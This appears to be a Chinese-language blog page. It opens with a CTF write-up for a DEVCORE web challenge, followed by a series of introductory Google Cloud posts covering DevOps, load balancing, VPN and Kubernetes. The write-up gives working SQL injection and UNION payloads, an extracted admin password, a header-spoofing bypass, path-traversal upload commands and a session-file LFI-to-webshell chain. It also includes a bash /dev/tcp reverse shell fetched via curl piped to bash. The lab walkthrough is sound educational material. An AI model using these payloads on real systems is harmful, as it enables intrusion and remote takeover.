匯出 PDF- print.php?id=35163&sig=PFRo8eZYWmnXmM4UJfApOvPZlnBtQoIsoRejgCzlIe5fkPu8FnxhYmD56zlSblHY
觀察以上幾個頁面的原始碼，我們可以快速的發現 print.php 上面有一個 SQL injection 的弱點 php $res = $pdo->query(" SELECT * FROM orders WHERE sig_hash = '$sig_hash' AND id = $id LIMIT 1 ", PDO::FETCH_ASSOC);- 使用者可控 id 的部分我們可以隨意來寫個http://web.ctf.devcore.tw/print.php?sig=1&id=1 or 1=1然後就拿到 Flag 了 ?__?官方報告- 欸好ㄛ，我的方法是一個非預期解的意思，那我們來看一下正規解- http://web.ctf.devcore.tw/order.php?id=1&sig[]=
就拿到 Flag 了
而原理可以看官方報告上有詳述，主要就是因為 sig 參數給予一個 [] 代表陣列，會讓 php 解到爛掉

弱點 04：Use of Less Trusted Source

對，我先寫 4 ，因為我先解出 4 才找到 3 的
剛剛我們找到了一個 SQL injection 的漏洞，所以可以用 SQL injection 來取得所有資料庫裡面的資料所以需要先透過 information_schema 那一串套路去看 SQL 裡面有哪些 DB 、 Table 、 Column 再來選嗎?答案是不用的，因為我們已經有完整的 Source Code 所以可以直接看!觀察檔案- 從最最前面 mount 的資料夾中，我們可以看到其中有一個 b8ck3nd 的資料夾
b8ck3nd/index.php裡面有 include.php , upload.php``b8ck3nd/include.php- 裡面有一段說到，我們的 IP 必須為 ['127.0.0.1', '172.18.11.89'] 才能進入後台，不然會被導向首頁
還有說到，沒有登入的話，會被導到 login.php``b8ck3nd/login.php- 裡面有一段 SELECT * FROM backend_users WHERE username = %s AND password = %s'它的 username 跟 password 都會經過 quote，所以不能從這邊直接的進行 SQL injection
但我們可以確定 Table backend_users 裡面一定有 username, password 這兩個 Column正式 SQL injection- 回到前一題的 SQL injection 如果我們給予 or 1=1 的話，可以取得 Flag2 ，如果給予 or 1=0 的話，則畫面會空白，最無腦的方法就是使用 Boolean based 的 SQL injection
不過由於它回傳的是一個 PDF 檔案，所以 SQLMap 會解到壞掉這邊我使用 import pdftotext 來讀取 PDF 的內容，如果 steven 這個詞出現在 PDF 中，就代表 True ，不然就代表 False
自己刻一個 Binary Search 的 Boolean Based SQL injection Payload 就可以爆出資料庫的所有資料了，我有程式碼但寫得很醜，就先不公布ㄌ XDD。另外一種解法 (Wii Wu 提供)- 其實可以透過 UNION Based 的方法來取
http://web.ctf.devcore.tw/print.php?id=-1 UNION SELECT id as id, username as email, password AS phone ,NULL,NULL,NULL,NULL,NULL,NULL FROM backend_users
至此我們可以取得- username : admin
password : u=479_p5jV:Fsq(2回到前面說的 b8ck3nd/include.php- 我們必須要使用 127.0.0.1 或是 172.18.11.89 IP 才能進入後台
最常見的方法是透過修改 X-Forwarded-For 的 Header 來進行達成詳見 : https://devco.re/blog/2014/06/19/client-ip-detection/
通常大多數人會使用 BurpSuite 進行修改，不過我個人推薦使用更懶人的 Firefox Plugin順利訪問後台 http://web.ctf.devcore.tw/b8ck3nd/login.php- 可以使用上述的帳密進行登入，取得 Flag 4- 官方報告-
好的，看起來很符合

- 但我的 Flag3 去哪了 QQ

弱點 03：SQL Injection

其實我合理猜測是因為我們快速地透過原始碼取得 Column 跟 Table 進行登入，但省略了某些東西，Flag 在裡面。因為至今還沒有出現 SQL injection 的弱點報告，但我們都透過 SQLinjection 取得兩個 Flag 了 XDDDD
接下來我就直接借用 Wii Wu 提供的 Union Based 來寫使用 SQL 取得 DB, Table, Column 的老梗來找
但我想反著找，看看 backend_users 裡面有沒有什麼有趣的其他 Column
http://web.ctf.devcore.tw/print.php?id=-1 UNION SELECT NULL, NULL, group_concat(column_name), NULL, NULL, NULL, NULL, NULL, NULL FROM information_schema.columns WHERE table_name='backend_users'
我們可以看到還有一個 description 的 column取得 description 欄位的值即為 Flag- http://web.ctf.devcore.tw/print.php?id=-1 UNION SELECT NULL, NULL, description, NULL, NULL, NULL, NULL, NULL, NULL FROM backend_users
官方報告

-

弱點 05：Unrestricted File Upload

接下來繼續地回到了 Code Review 的環節b8ck3nd/index.php裡面發現會把一些資訊傳到 upload.php``b8ck3nd/upload.php- 程式分成了兩個部分如果透過 GET Method 進入，會回傳一段 JWT，但對於解題沒有任何幫助
下面有一段是沒有任何前端對應的後端 API可以上傳檔案
參數 rename 可以指定檔案名稱
參數 folder 可以指定檔案資料夾會透過 $filename = $folder.'/'.$filename; 直接把資料夾跟檔名進行串接
很值觀的猜測可以用 folder 來進行任意位置寫入所以我們可以隨便上傳一個檔案看看，但要記得帶上 Header 跟 Session Cookie，但當大家看到這篇時，理論上下面的 Session 已經過期ㄌ- echo meow > meow.txt
Session Cookie 可以透過瀏覽器 F12 取得
curl -H 'X-Forwarded-For: 127.0.0.1' --cookie 'PHPSESSID=5qh67f4o30aa8r2313gjv8iucd' -F 'file=@meow.txt' -F 'rename=meow.txt' -F 'folder=../../../../../../tmp' http://web.ctf.devcore.tw/b8ck3nd/upload.php上面的 command 丟出去就可以取得 Flag5- 官方報告

-

弱點 06：Local File Inclusion

我覺得這一段是全部裡面最難的部分，我個人卡了超級超級久
首先大家應該會非常直觀的想到如果我把程式碼寫到 frontend/, images/, 或 b8ck3nd，是不是就可以成功地拿到 Webshell
但事實真正的嘗試會發現這些目錄都不可寫回到觀察程式碼的部分- frontend/include.php我們可以發現有一行 require_once('langs/' . $_SESSION['lang'] . '.php');
而如果我們訪問 frontend/index.php 就會呼叫到 frontend/include.php所以 …… 這邊會是一個 LFI 的漏洞嗎?- LFI 的前提要是 Session 可控
我們可以查資料發現到，PHP 的 Session 資料會放在 /tmp/sess_{SESSION_ID}
我們使用弱點 1 就可以快速的取得目前我們的 Session 資料那我們是不是可以把 Session 資料載下來，自己進行竄改之後達成 LFI 2 RCE 呢?- 假設我們使用弱點 6 寫入一個 Webshell 在 /tmp/meowmeow.php
再來，控制 $_SESSION['lang'] ，設定為 ../../../../../../tmp/meowmeow (在frontend/include.php 會自動幫我們加上 .php)
訪問網頁首頁即可取得 webshell首先我們先下載 curl http://web.ctf.devcore.tw/image.php?id=$(echo -n '../../../../../../../tmp/sess_5qh67f4o30aa8r2313gjv8iucd' | base64 -w0) -o sess_meow- 內容是 lang|s:5:"zh-tw";user_id|s:1:"1";
就算不懂結構我們也可以猜出zh-tw 是我們需要變更的部分
s:5 是後面接的字串長度所以我們準備一個檔案- lang|s:33:"../../../../../../../tmp/meowmeow";user_id|s:1:"1";
上傳到 /tmp/sess_meowmeow
curl -H 'X-Forwarded-For: 127.0.0.1' --cookie 'PHPSESSID=5qh67f4o30aa8r2313gjv8iucd' -F 'file=@sess_meowmeow' -F 'rename=sess_meowmeow' -F 'folder=../../../../../../tmp' http://web.ctf.devcore.tw/b8ck3nd/upload.php
可以觀察確定上傳正確再準備一個 webshell- `` 命名為 meowmeow.php
上傳到 /tmp/meowmeow.php
curl -H 'X-Forwarded-For: 127.0.0.1' --cookie 'PHPSESSID=5qh67f4o30aa8r2313gjv8iucd' -F 'file=@meowmeow.php' -F 'rename=meowmeow.php' -F 'folder=../../../../../../tmp' http://web.ctf.devcore.tw/b8ck3nd/upload.php
確認檔案上傳正確最後我們只需要使用 meowmeow 這個 Session ID 訪問 index.php 即可拿到 Webshell- curl -H 'X-Forwarded-For: 127.0.0.1' --cookie 'PHPSESSID=meowmeow' http://web.ctf.devcore.tw/index.php?meow=ls
當然我們也可以用酷炫的方法拿 Reverse Shell- (需要自備一個有對外 IP 的電腦或 Ngrok，不做這一段也可拿 Flag)
首先在機器上準備一個 s8787 檔案bash -c 'bash -i >& /dev/tcp/{自己的IP}/8787 0>&1'輸入 python3 -m http.server 8000- 開啟一個 Python HTTP Server在自己電腦上開一個 nc 接收- rlwrap nc -nlvp 7877 (沒有 rlwrap 就直接 nc 也可)curl -H 'X-Forwarded-For: 127.0.0.1' --cookie 'PHPSESSID=meowmeow' 'http://web.ctf.devcore.tw/index.php?meow=curl%20http://{自己的IP}:8000/s8787%20%7C%20/bin/bash'執行下去後，會發現 Python HTTP Server 接收到了一個 Request- 我們的 nc 端也收到一個 Reverse Shell- 觀察根目錄的檔案-
我們會發現沒有權限讀 flag，但是我們有一個檔案叫做 readflag，它有 SUID 且 Owner 是 Root
透過 file 觀察可以確定它是一個執行檔
直接執行 ./readflag 即可取得 Flag

[Day30] Cloud Meow Meow (2021 鐵人賽 – Cloud)

Fri, 15 Oct 2021 19:10:00 +0800

喵喵喵喵喵喵喵喵！！！終於寫完 30 天的文章了，這 30 天中，我們從雲端的概念開始，進入了 Google Cloud 的世界。接著開始介紹了 Google 中的各種運算資源、儲存資源、網路服務，最後介紹了微服務、DevOps 等潮潮設計的方法。

這是我第一次參加鐵人賽，真的非常高興可以完賽，雖然途中真的一度有想放棄的想法發生，每天寫文章真的是一件很累人的事QQ，~~所以那幾天的文章都非常的短，就當作讓我偷懶一下ㄅ喵喵~~。
如果過去 30 天的文章內容有任何不事宜，或是講解不清楚的地方，也請大家不吝於留言區告訴我！

最後來講一下我的感言吧，真的非常感謝 Google Cloud 在今年舉辦了 Google Cloud Student Sprint Project，提供了我非常多的資源對於 Google Cloud 方面。我也要很謝謝我當初的 Mentor : Eric 在每周的 Meeting 都讓我問爆，感謝計畫中的所有組員讓我有動力可以完成了這項的計畫，考取到 ACE 證照。

再來我也要感謝 iTHome 舉辦了這個比賽，讓我這個金魚腦在學會這些知識，還沒有完全忘記前就重新用自己的話重新整理了一次！也感謝參加鐵人賽的組員給予我的幫忙與鼓勵！

[Day29] Cost Plaining (2021 鐵人賽 – Cloud)

Thu, 14 Oct 2021 19:10:00 +0800

終於到了倒數第二篇文章了，今天來介紹雲端付費相關的計畫，透過一些小技巧，可以減少在雲端上的很多開銷哦！

首先要介紹的是 Google Cloud Pricing Calculator，透過計算機，我們可以快速的估計機器的相關成本。

Compute Instances 的 VM，在啟動一段時間後，如果 CPU 使用率或 Memory 使用率一直很低，Google Cloud Console 上也會有建議，可以依照建議修改自己的機器配置。VM 的計價方式也有一些優惠，如果 30 天內持續租用，可以獲得較多的優惠！而如果是批次性運算的程式，沒有非常大的即時性需求，也可以試著採用 Preemptible VM instances。

儲存相關的話，VM 的硬碟是可以在開機狀態下進行擴展的，所以不需要一開始就開的非常大，可以減少不少的開銷。也可以比較標準硬碟與兩種 SSD 的方案，是否真的有這些需求。Cloud Storage 若要存放長期，極少存取的備份檔案，可以優先的採用 Nearline 或 Coldline 、 Archive 等方式。

我們也可以結合 Cloud 的 Monitoring 相關服務隨時監控各種服務的狀態，如有閒置或不合適的情形發生，就即時的進行處理。

[Day28] Security (2021 鐵人賽 – Cloud)

Wed, 13 Oct 2021 19:09:00 +0800

在網路世界中，安全永遠是最最重要的事情，而雲端安全當然也不例外。任何的安全問題都來自於人為的疏忽，部分雲端上面會遇到的安全問題，在地端的機器上也會遇到，例如常見的 OWASP TOP 10 上的網路攻擊，或是 DDoS 等。除了這種面對駭客的攻擊之外，我們也要注意公司內的意外內賊部分，如這則新聞，三立電視的離職員工透過 Tor 返回原公司的 AWS 帳號中刪除檔案。

今天我主要會介紹的是 Google Cloud 的管理層面，有哪些可以注意的地方，這邊會介紹人、機器與網路三個層面。

人

人的問題為例，最最重要的就是 IAM 相關的管理，身為一個雲端的管理者需要使用資料夾的方式管理公司內的各個部分，並且掌握「保持最低權限」的原則，盡量的讓使用者在可以順利做事情的最低權限，特別注意 Owner 與 Editor 的權限不能無止盡的發。而當公司人員掉離部門或離開公司後，應該要立刻修改它的 IAM Rule。

機器

機器相關的問題，一樣回到 IAM 上，我們需要確保每台機器的 Services Account 權限是否合宜，是否有可能使用者或惡意的攻擊者從低權限的機器，藉由 Services Account 的 Rule 而橫向移動到其他抬高權限的機器之中。如果是自己管理的作業系統，需要確認作業系統是否有安全性的更新需要進行修補。而部屬的程式上的安全則暫時不在今天雲端的討論範圍內，可以參考我隔壁棚的滲透測試文章。

網路

網路層面的安全其實一樣基於「最低權限」的原則，一台不需要聯外的伺服器就不要給它 Public 的 IP，而需要對外的服務也需要透過防火牆來限制 Port Forwarding；可以透過 Google Cloud 的 Load Balancing 進行 DDoS 的檢測，並透過 Cloud CDN 或 Cloudflare 等 CDN 服務進行防禦。Google Cloud 也有提供 Cloud Armor 與 WAF 等服務保障網路層面的安全。

[Day27] Dev Ops (2021 鐵人賽 – Cloud)

Tue, 12 Oct 2021 19:09:00 +0800

其實這次就已經有一個鐵人賽組別完全是 DevOps 了，如果對於這個領域想要比較深入的了解，可以去看該組大大們的文章。我在這邊只打算輕鬆的介紹一下 DevOps 的概念。DevOps 是 Development 跟 Operations 的組合詞，重點是透過一系列的 pipeline 完成自動化的軟體開發與維運，可以簡單的交付軟體與變更架構。

講到 DevOps，首先一定要提到的就是 Continuous Integration 、 Continuous Delivery (CI/CD) ，持續性整合與部屬。簡單來講，就是將程式碼的 Deploy 流程給自動化。而 CI ，持續整合，主要是透過自動化的 Build 程式，確保不會產生環境版本不一致的問題；程式也可以透過 Unit Test 的方式自動化的檢察功能是否正確。CD 持續部屬，則是自動化的將程式碼給 Deploy 到實際環境中，確保每次的更新都可以很順暢。

以 Google Cloud 為例，我們可以將程式碼統一上傳至 Cloud Source Repositories 進行管理。接著，我們可以使用 Cloud Build 對程式碼進行編譯，或包裝成 Docker 的 Image。透過 Build Trigger 追蹤 Repositories 是否有更改，如果有任何的更動就自動化的觸發 Cloud Build。最終， Build 出來的 Container 可以儲存在 Container Registry 中。

在 DevOps 的環境中，我們也可以透過 Jenkins 等程式進行自動化的建置，Jenkins 也可以在 Google Cloud 的 Marketplace 直接的進行安裝，而管理的過程，我們也可以透過 Google Kubernetes Engine 進行管理。蒐集 Log 的部分，也可以透過 ELK (Elasticsearch、Logstash、Kibana) 進行有效率的資料蒐集與視覺化。

[Day26] Micro Services (2021 鐵人賽 – Cloud)

Mon, 11 Oct 2021 19:08:00 +0800

在前幾天的 App Engine 與 K8S 中，或許我已經大致的提過 Micro Services ，今天來試著更詳細的介紹 Micro Services 的概念。

Micro Services 不限於任何的程式語言，無論 Python、Node.JS 或 Go 都有辦法實現，它最大的特色就是「模組化」，把一個大程式給切割成一塊一塊的模組，方便維護與管理，當面對一個非常龐大的系統時， Micro Services 也可以快速的定位發生的問題。

與 Micro Services 相對的是 Monolithic application 單體式應用程式，也就是將所有的功能全部寫在一起，這種方式以連接角度而言，設計會比較單純與簡單，開發時程上也會比較快。但當整個系統日益增大，則維護上會較為困難。

相較於單體式程式，微服務還有另外一個特色是可以快速的將任何一個模組進行擴展，假設我們有一個銷售網站，而微服務切分了物品的展示前端，與實際購買，處理訂單的後端。在雙 11 等活動時，假設我們已知大多數的客戶已經將需購買的商品加至購物車，這種情形下，我們就可以單純的透過 K8S 的 Scaling 相關設定，設定擴展銷售後端的模組，而不需要連同前端一起進行擴展，減少租用機器的費用。

微服務最大的特點就是每個服務應該獨立自主，因此服務間最好需要有獨立的資料庫，服務間唯一的溝通方式是透過 API (最常見的是透過 RESTful) 進行交互。

12 Factor App Design

基於 Micro Services 設計的 SaaS 最佳實踐方式，目前最有名的是 The 12-Factor App ，關於相關的介紹可以參考去年 Miles 大大的鐵人賽文章。簡單來說，我們的開發過程可以遵守 12 Factor 的方式，有效的開發方便移植、擴展的程式。而這 12 Factor 依序是：

Codebase- 使用版本管理系統，例如 Git。
Dependencies- 使用套件管理系統，例如 pip、npm。
Config- 不要將 API Key 等機密資料放至於程式碼字串中。
Backing services- 資料庫，快取等資源可藉由 URL API 訪問。
Build, release, run- 嚴格分離程式碼的 Build 與 Run 階段。
Processes- 一個程式可分為一個或多個 Process，每個 Process 應為 stateless。
Port binding- 透過 Port binding 方式讓程式可以聯外。
Concurrency- 透過 Process Model 進行水平擴展。
Disposability- 快速啟動，追求穩定性，並可以優雅的關機。
Dev/prod parity- 保持開發與部屬的環境一致。
Logs- 將 Log 透過 event Stream 輸出。
Admin processes- 將維護與管理視為一次性的任務。

[Day25] SLI , SLO , SLA (2021 鐵人賽 – Cloud)

Sun, 10 Oct 2021 19:08:00 +0800

今天來介紹雲端的管理，常常出現的三個名詞，在先前的文章中，我應該也有使用過了一部分。這三個名詞長的很像，而背後的意義卻有滿多的差異，都算是滿重要，滿常用的的名詞哦！這些算是服務級別的術語，描述服務常見需要衡量的指標。

Service Level Indicators , SLI

SLI 被稱為服務級別指標，我們可以理解成它是我們需要衡量一個服務的哪些指標。例如一個服務的網路吞吐量，延遲時間與錯誤率等。在 SLI 中，我們只需要訂出，我們需要衡量哪些東西就好，而剩下的則是交由 SLO 進行規範。

Service Level Objectives , SLO

SLO 被稱為服務級別目標，通常是提供服務者需要明確定義給客戶的量化指標。這邊我們就可以定義 SLI 必須要符合的規定 Range，例如我們要求一個網頁在台灣地區的回應時間必須小於 10 毫秒，等明確的定義。

Service Level Agreements , SLA

SLA 則是服務的級別協定，通常是服務商與客戶之間正式需要簽的合約，保障系統的穩定性。而服務商如果沒有達到指定的 SLA 則可以被客戶要求賠償，而 SLA 會涵蓋的內容相對而言最具有限制性。

我們以 Google Cloud Storage SLA 網頁上提到的，來觀察它的 SLI 、 SLO 以及 SLA 分別是什麼。例如 Standard storage 的 Monthly Uptime Percentage >= 99.95，這就算是一個 SLA 的規定。而它們的也有在下文題到，如果沒有達到指定的 SLO 會給予賠償等。

[Day24] Marketplace (2021 鐵人賽 – Cloud)

Sat, 09 Oct 2021 19:07:00 +0800

對於初學者來說，自動化的部屬真的是一件非常累人的事情，從雲端架構開始就有一大堆東西要學，再加上昨天提到的 IaC，如果真的要講應該也可以寫成 30 天分的教材QQ。如果我們只是一個非常非常淺的初學者，有沒有什麼方法可以快速的自動化部屬服務到 GCP 中呢？當然有的，這就是 Marketplace。

我們可以很簡單的把 Marketplace 想像成 App Store 或 Play 商店，我們想要的服務，有很大的機會都不需要自己重造輪子。舉例來說，我們假設需要架設一個 WordPress CMS 的 Blog，如果透過 Compute Engine，可能會需要先設定系統，安裝 PHP 、 MySQL，再來安裝 WordPress。而如果希望資料庫分離的話，雖然可以透過 Cloud SQL 來處理 MySQL 的部分，不過依然需要處理很多底層的東西QQ。

在 Marketplace 之中，我們可以一鍵的部屬別人設定好的安裝檔，大多數都是透過 Deploy Manager 建置的完整腳本，如上述的 Wordpress，我們可以快速的依照它人設定好的腳本來進行部屬，常見的 MongoDB、ELK 等資料庫也都可以快速的在 Marketplace 中進行部屬。

Marketplace 中，也有包含了 SaaS 等相關服務的方案可以選擇，部分的方案是需要付費的，使用與購買前也需要特別注意哦！

[Day23] Infrastructure as code (2021 鐵人賽 – Cloud)

Fri, 08 Oct 2021 19:07:00 +0800

昨天介紹的 Deployment Manager 可以透過 GUI 與 Command Line 的方式管理資源，算是 GCP 中自己專有的功能。而 Google 也支援了 IaC 的常見軟體，例如 Terraform、Chef、Puppet、Ansible、Packer 等。

IaC (Infrastructure as code)，基礎架構即代碼，指的是透過程式碼來對各種基礎設備進行管理與配置，而上述的這些軟體也不僅適用於 GCP 中，可以基本上將相同的代碼做些微的修改，套用到其它的雲端服務商，例如 AWS 與 Azure 等，在不同服務商間轉換設備相對而言會非常的方便。

透過 IaC，可以減少繁複的操作一模一樣的事情，也可以批次化大量的管理設備，對於 DevOps 等環節而言會方便非常多。

以 Terraform 為例，通常我們會使用 YAML 檔案設定各種部屬的基礎設備資訊。但例如 VPC 與防火牆 Rule，這些 IP 位置則比較像是一個變數，這種時候我們可以透過 Jinja 的 Template Engine 進行設定。

[Day22] Deployment Manager (2021 鐵人賽 – Cloud)

Thu, 07 Oct 2021 19:06:00 +0800

從今天開始的內容，會相對比較簡單一點點，我們來介紹一些自動化的部屬方式。假設說，我們設定好了一系列的 Instance 、 VPC 架構、防火牆規則等相關的服務，未來一個方案需要重新利用時，就可以透過 Deploy Manager 與明後天會介紹到的 IaC 等方式進行快速的部屬。

我們部屬 Google Cloud 的服務，通常會使用 Cloud Console、Cloud Shell 或 SDK，在還沒有學習到 Deployment Manager 前，如果我有自動化需要部屬大量的設備，通常我會直接把需要部屬的內容寫成 Bash 的 Shell Script ，並透過 Cloud Shell 執行，這種方式很暴力，但很有用 XDD。

Deployment Manager 屬於 Infrastructure Automation Tool，可以透過 GUI 的介面，在 Cloud Console 對於不同的資源在部屬前進行規劃，也可以將各種資源們建立成模板，方便重複使用。Deploy Manager 背後使用了各種 GCP 底層的 API 進行設計，基本上可以支援所有 GCP 的服務部屬。

[Day21] Load Balancer (2021 鐵人賽 – Cloud)

Wed, 06 Oct 2021 19:06:00 +0800

Load Balancer (負載平衡器) 與 Auto Scaling 都算是雲端設備中非常重要的一部分，負載平衡器可以將流量分散到多台不同的機器，而這些服務對外只需要一個 IP 即可。透過 Load Balancer ，我們可以增加資料的可用性與穩定性，並且可以透過 Auto Scaling 的方式自動增減在 Load Balancer 後的伺服器數量。

在 GCP 中， Load Balancer 被分為兩種，Global 與 Regional。Global 的 Load Balancer 有 HTTP(S)、SSL Proxy 與 TCP Proxy，在全球的使用者可以使用相同的 IP ，存取到就近國家的主機，減少傳輸的延遲；Regional 的 Load Balancer 則有 Internal 與 Network Load Balancer，Internal Load Balancer 基於 Google 開發的 SDN Andromeda進行實作，而 Network Load Balancer 則使用 Maglev 的分散式系統進行實作。

Instance Template / Group

在開始講 Load Balancer 之前，我們需要先了解 Instances Group，在假設我們 Load Balancer 背後每一台機器都是一樣的前提下，我們會需要建立很多台內容完全一樣的 Compute Engine VM Instances，這種狀況下，我們就可以使用 Compute Engine 中的 Instance Template，作為 Load Balancer 未來開啟的模板。Instance Template 就像是一個 VM 的模板，他的建立方式與建立 Instances 將近完全一樣，設定 VM 的 Image、Startup Script 等。

[Day20] Interconnect (2021 鐵人賽 – Cloud)

Tue, 05 Oct 2021 19:05:00 +0800

今天來與各位介紹雲端的互連網路(Interconnect) 與對等互聯(Peering) 相關服務。Interconnect 與 Peering 最大的差別在於，Peering 屬於 OSI 第 3 層的連接，而 Interconnect 屬於 OSI 第 2 層的連接。而他們又再分為了 Direct Peering、Carrier Peering、Dedicated Interconnect、Partner Interconnect。

對等互連 Peering

直接對等互連 (Direct Peering) 可以在自己的連結上透過 BGP 來切換與 Google 的連線，可以讓自己的企業區域網路直接的連接上 Google 的邊際網路。

電信業者互連 (Carrier Peering)，透過電信業者作為中介，進行連接。

互連網路

專屬互聯 (Dedicated Interconnect)，提供了直接連線到 Google 的專用網路。可以選擇 10 GBps 或 100 GBps 的專線連接上 Google。也可以使用支援 RFC1918 的 IP Address 進行連線。

合作夥伴互聯 (Partner Interconnect)，如同電信業者互連，可以藉由電信業者、Google的合作夥伴進行連線。

比較

關於這些連接方式的詳細比較，可以參考下圖：

(圖片來源：Connecting to Google Cloud: your networking options explained https://cloud.google.com/blog/products/networking/google-cloud-network-connectivity-options-explained)

[Day19] Cloud VPN (2021 鐵人賽 – Cloud)

Mon, 04 Oct 2021 19:04:00 +0800

Cloud VPN

Cloud VPN 可以將自己本地的網路直接的連接到 GCP 的 VPC 網路之中，透過 IPSec 協議進行加密，可以保護資料在網路上傳輸的安全性。

Cloud VPN 屬於由 Google 託管的服務，提供了 99.9% 的 SLA，並支援 Side to Site 的 VPN、靜態路由、動態路由、IKEv1 與 IKEv2 的密碼等功能。

在建立 Cloud VPN 前，我們需要建立本地端的 VPN Gateway 、雲端的 VPN Gateway 以及兩個 VPN Tunnel， Cloud VPN 的 Gateway 屬於一個 Regional 的資源，因此需要使用一個 external IP 。

本地端的 VPN Gateway 可以是硬體的主機，也可以是軟體的 VPN 服務，安裝在本地或其他雲端伺服器中。

目前 Cloud VPN 的最大傳輸單位 (MTU) 為 1460 Bytes。

Cloud Router

Cloud VPN 支援靜態以及動態路由，如果需要使用動態路由，則需要開啟 Cloud Routers 的功能。 Cloud Routers 支援透過 BGP (Border Gateway Protocol) 管理 Cloud VPN Tunnel 的路由。

[Day18] Operations Suite (2021 鐵人賽 – Cloud)

Sun, 03 Oct 2021 19:04:00 +0800

今天我們來介紹雲端的監控， Cloud Operations Suite 。這個服務以前被稱做 Stackdriver 。雲端的監控總共可以分為，Monitoring、Logging、Error Reporting、Tracing 以及 Debugging。

這些監控相關的程式 (Agent) 支援跨平台，除了 GCP 之外，也可以安裝在 AWS 或是自己的主機上面，這些服務皆有免費額度可以使用。

Monitoring

伺服器的監控是一件非常重要的事情，這是 SRE (Site Reliability Engineering) 最重要的工作。

Monitoring 支援了各種的指標，包含平台、系統、應用程式，可以將圖表、警報顯示於儀表板 (Dashboards) 中。

Logging

Cloud Logging 提供分析 GCP 以及 AWS 上的各種事件，Logging 包含了紀錄的儲存、使用者介面 (Log Viewer) 以及 API，可以透過程式化的方式管理 Log。

與 Monitoring 一樣，我們也可以透過腳本將 Agent 安裝在自己的伺服器中，監控伺服器的網路流量、IP 來源等資訊。如果我們想要 Query 大量的 Logging 資料，也可以使用 BigQuery 等程式來達成。

Error Reporting

Error Reporting 可以統計、分析在雲端服務中的各種錯誤，提供了錯誤的通知、儀表板等功能。支援 App Engine 、 Apps Script 、 Compute Engine 、 Cloud Functions 、 Cloud Run 、 GKE 、 Amazon EC2 等平台。當我們使用以上的平台，部屬過程與運行過程發生任何的錯誤，都可以在 Error Reporting 中找到相應的 Log。

[Day17] Cloud Run (2021 鐵人賽 – Cloud)

Sat, 02 Oct 2021 19:03:00 +0800

Cloud Run 是這次要介紹的最後一種部屬服務方式。它是一種基於 Container 的 Serverless 服務。比起 Google Kubernetes Engine，使用者不需要自己的管理 K8s 的服務。

Cloud Run 背後使用了開源的 Knative 服務，使用者可以直接的使用 Cloud Run 管理自己的 Container。除此之外，它最大的特色是，使用者也可以將 Cloud Run 的服務，搬回自家的 Kubernetes Engine 上進行執行，連接上自己的 VPC。

在使用 Cloud Run 之前，使用者必須先將自己的 Container 上傳至 Cloud Container Registry 中。

Cloud Run 與 Kubernetes Engine 都可以結合一整套的 Google 服務的生態系，達到 DevOps 的功能。舉例來說，我們最終的目標是要部屬一個由 Python 的服務，將程式寫完後，我們可以將程式推送到 Cloud Source Repositories 中，並串接 Cloud Build 的 Trigger，將 Docker 給 Build 起來後，放置於 Container Registry 中，再提供 Cloud Run 進行執行。

Cloud Application Deployment 比較

這幾天，我們總共介紹了 5 種不同，可以部屬自己程式的服務，分別是 Compute Engine、Kubernetes Engine 、 Cloud Run 、 Cloud Functions、 App Engine 。

[Day16] Functions (2021 鐵人賽 – Cloud)

Fri, 01 Oct 2021 19:01:00 +0800

Cloud Function 是一款 Serverless 的服務，使用者不需要管理伺服器。Google 官方說，它是一種 FaaS (Function as a Services，函式即服務)，它可以透過透過 HTTP 的 API 來基於事件做出相對應的動作。在 AWS 上，最相似的功能是 Lambda。

目前 Cloud Functions 是透過 Node.js 的 JavaScript 進行編寫，並運行在 GCP 中。

Cloud Functions 最主要可以區分成兩個重點 Event (事件) 與 Trigger (觸發)，Event 可以是 HTTP 的 Webhook，Cloud Storage、Cloud Pub/Sub 、 Cloud FireStore 等方式，我們可以收取、訂閱指定的 Event，並設定當 Event 發生後，需要做的事情 (Trigger) 是什麼。

舉例來說，我們如果希望透過 Cloud Storage 建立一個線上的相簿，而相簿通常除了完整尺寸的原圖之外，為了減緩頻寬、加快載入速度，通常會採用縮圖預覽的格式。我們就可以透過 Cloud Functions 來建立一個 Event ，設計為「當 Cloud Storage 上傳了新的圖片」，則觸發 Trigger 「透過 Function 自動產出一張壓縮尺寸後的縮圖，存放進 Cloud Storage 中」。

[Day15] App Engine (2021 鐵人賽 – Cloud)

Thu, 30 Sep 2021 19:01:00 +0800

今天要來介紹 Google Cloud 中的 App Engine，App Engine 是一款 PaaS 的服務，可以超簡單的進行部屬與維護，使用者也可以專注於開發程式，而不需要煩惱任何關於底層架構的問題。 PaaS 適合用於可擴展的網路應用程式、行動服務的後端等，例如 Chatbot 、輕量化的 API 等服務都很適合可以部屬在 App Engine 上。

App Engine 提供了許多內建的 API，例如 NoSQL 資料存儲、記憶體快取、負載平衡、應用程式 Log 紀錄、身分驗證 API 等。藉由 Security Scanner 的功能， App Engine 可以自動化的掃描與偵測程式的漏洞，提醒開發者進行修補。

App Engine 會透過使用者的流量，自動化的擴展程式後端的伺服器，使用者只需要將程式碼上傳至 App Engine 的管理後臺即可，剩下的問題全部都由 Google Cloud 進行處理。目前，常見的開發環境例如 Eclipse、IntelliJ、Maven、Git、Jenkins、PyCharm 等程式都支援部屬 App Engine 的服務。

App Engine 目前有兩種環境，分別為 Standard 與 Flexible。

Standard Environment

標準的環境可以簡單的部屬使用者的 APP，支援 Autoscale 等功能，相較於 Flexible 便宜不少。它有每天的免費額度可以使用。在標準的環境中，有提供幾個常見的 runtime 供大家使用，包含了 Java、Python、Go 與 PHP。

在使用 App Engine 時，必須符合一定的 Sandbox 規範，例如不可將檔案寫到本地的硬碟中，需要透過資料庫的形式儲存資料；每一個 Requests 最長的 Timeout 為 60 秒；對於安裝第三方的程式、Library 也有限制。因此需要基於 App Engine 的 SDK 進行開發。

[Day14] Kubernetes (2021 鐵人賽 – Cloud)

Wed, 29 Sep 2021 19:00:00 +0800

昨天簡介完了 Docker 的容器相關內容，今天我們要來介紹的是 Kubernetes (K8S)，其實 K8S 可以介紹的內容真的非常非常非常多，相信隔壁棚 DevOps 也有許多文章，光是 K8S 就可以介紹完整的 30 天。

Kubernetes，念做(哭ㄅㄋㄟ體死)，它在希臘語中，代表的是舵手，駕駛員的意思；做為 Docker 的管理工具，感覺也有一種管理的味道存在(?)。 Kubernets 是由 Joe Beda、Brendan Burns 和 Craig McLuckie 共同創立，而目前主要的維護是由 Google 的工程師負責。而 Kubernets 又難念，又難寫，連外國人都這麼認為，所以就簡稱為 K8s，8是因為 ubernete 剛好有 8 個字。

Kubernetes

Kubernetes 可以是為一個高層次的 Docker 抽象化管理器，在最高層級中，Kubernetes 可以透過一系列的 API 對於 Cluster 中的 Node 、 Container 進行管理。

